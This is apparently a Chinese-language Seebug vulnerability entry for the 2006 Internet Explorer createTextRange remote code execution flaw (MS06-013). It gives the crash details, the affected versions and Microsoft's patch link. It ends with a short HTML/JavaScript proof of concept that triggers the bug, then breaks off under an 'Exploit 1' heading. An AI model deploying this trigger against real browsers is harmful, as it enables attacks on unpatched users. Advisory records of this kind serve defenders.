Microsoft Internet Explorer CreateTextRange远程代码执行漏洞(MS06-013)

2006-10-28T00:00:00
ID SSV:288
Type seebug
Reporter Root
Modified 2006-10-28T00:00:00

Description

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer的createTextRange()函数实现上存在漏洞,远程攻击者可能利用此漏洞在客户机器上执行任意指令。

Internet Explorer使用createTextRange()时在某些环境下可能导致无需的列表指针引用,这样在试图调用引用的32位地址时就会出现错误,如下所示:

0x7D53C15D MOV ECX, DWORD PTR DS:[EDI] .. 0x7D53C166 CALL DWORD PTR [ECX]

由于这种引用,ECX会指向很远的不存在的内存位置,导致IE崩溃,也可能执行任意指令。

Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 5.0 SP4 Microsoft Internet Explorer 6.0 - Microsoft Windows XP SP2 - Microsoft Windows Server 2003 SP1 - Microsoft Windows Server 2003

Microsoft已经为此发布了一个安全公告(MS06-013)以及相应补丁: MS06-013:Cumulative Security Update for Internet Explorer (912812) 链接:http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true

                                        
                                            
                                                <input type="checkbox" id='c'>
<script>
    r=document.getElementById("c");
    a=r.createTextRange();
</script>

Exploit 1

##
# This file is part o